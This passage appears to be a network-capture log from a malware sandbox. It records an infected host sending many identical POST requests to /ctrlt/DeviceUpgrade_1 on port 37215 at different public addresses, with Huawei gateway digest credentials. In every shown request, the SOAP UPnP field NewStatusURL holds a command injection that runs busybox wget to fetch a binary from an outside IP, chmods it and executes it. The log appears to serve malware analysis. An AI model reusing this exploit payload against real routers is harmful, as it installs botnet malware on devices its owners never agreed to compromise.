                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9192.168.2.153827094.94.90.15137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.032891989 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10192.168.2.1537634222.22.132.5737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.032896042 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11192.168.2.1539820181.115.126.5837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.032915115 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12192.168.2.1534594190.21.40.12837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.032915115 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13192.168.2.156066894.71.196.17637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.032943010 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14192.168.2.1552404183.28.181.15437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.032952070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15192.168.2.1554852121.242.39.2637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.032979965 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16192.168.2.1559460156.61.113.10637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033045053 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17192.168.2.1555664121.59.184.11237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033046961 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18192.168.2.1559550152.254.176.4137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033104897 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
